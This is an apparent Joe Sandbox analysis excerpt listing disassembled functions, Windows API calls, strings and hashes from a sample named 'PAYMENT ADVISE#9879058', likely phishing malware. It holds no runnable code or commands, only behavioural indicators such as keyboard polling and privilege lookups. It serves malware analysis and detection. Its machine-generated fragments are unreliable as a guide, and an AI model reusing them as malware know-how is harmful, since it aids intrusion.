                          • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                          • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                          • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                          • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                          Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                          • RegCloseKey.ADVAPI32(?), ref: 00458615
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                          • __wcsicoll.LIBCMT ref: 004585D6
                          • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                          • RegCloseKey.ADVAPI32(?), ref: 004585F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                          • String ID: ($interface$interface\
                          • API String ID: 2231185022-3327702407
                          • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                          • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                          • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                          • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                          Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                          • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                          • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                          • _wcscpy.LIBCMT ref: 004365F5
                          • WSACleanup.WSOCK32 ref: 004365FD
                          • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                          • _strcat.LIBCMT ref: 0043662F
                          • _wcscpy.LIBCMT ref: 00436644
                          • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                          • _wcscpy.LIBCMT ref: 00436666
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 2691793716-3771769585
                          • Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                          • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                          • Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                          • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                          Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                          • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                            • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                            • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                          • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                          • __lock.LIBCMT ref: 00416B8A
                          • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                          • __lock.LIBCMT ref: 00416BAB
                          • ___addlocaleref.LIBCMT ref: 00416BC9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-2843748187
                          • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                          • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                          • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                          • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                          Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                          • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                          • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                          • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                          • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                          • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                          • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                          • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                          Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                          • SetKeyboardState.USER32(?), ref: 00453C5A
                          • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                          • GetKeyState.USER32(000000A0), ref: 00453C99
                          • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                          • GetKeyState.USER32(000000A1), ref: 00453CDA
                          • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                          • GetKeyState.USER32(00000011), ref: 00453D15
                          • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                          • GetKeyState.USER32(00000012), ref: 00453D4D
                          • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                          • GetKeyState.USER32(0000005B), ref: 00453D85
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                          • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                          • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                          • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                          Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                          • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                          • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                          • GetDlgItem.USER32(?,00000002), ref: 00437E70
                          • GetWindowRect.USER32(00000000,?), ref: 00437E82
                          • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                          • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                          • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                          • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                          • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                          • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                          • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                          Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                          • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                          • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                          • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                          Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ConnectRegistry_wcslen
                          • String ID: HH
                          • API String ID: 535477410-2761332787
                          • Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                          • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                          • Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                          • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                          Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                          • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                          • _wcslen.LIBCMT ref: 00460502
                          • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                          • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                          • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                          • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                          • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                          • GetWindowRect.USER32(?,?), ref: 004606AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                          • String ID: ThumbnailClass
                          • API String ID: 4123061591-1241985126
                          • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                          • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                          • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                          • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                          Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                            • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                          • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                          • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                          • ImageList_EndDrag.COMCTL32 ref: 0046F583
                          • ReleaseCapture.USER32 ref: 0046F589
                          • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                          • API String ID: 2483343779-2060113733
                          • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                          • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                          • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                          • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                          Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                          Download Yara Rule
                          APIs
                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                          • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                          • GetClientRect.USER32(?,?), ref: 0046FEF2
                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                          • DestroyIcon.USER32(?), ref: 0046FFCC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                          • String ID: 2
                          • API String ID: 1331449709-450215437
                          • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                          • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                          • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                          • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                          Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DestroyWindow
                          • String ID: static
                          • API String ID: 3375834691-2160076837
                          • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                          • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                          • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                          • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                          Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                          • _memcmp.LIBCMT ref: 004394A9
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                          Strings
                          • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                          • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                          • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                          • API String ID: 1446985595-805462909
                          • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                          • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                          • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                          • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                          Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                          • API String ID: 2907320926-41864084
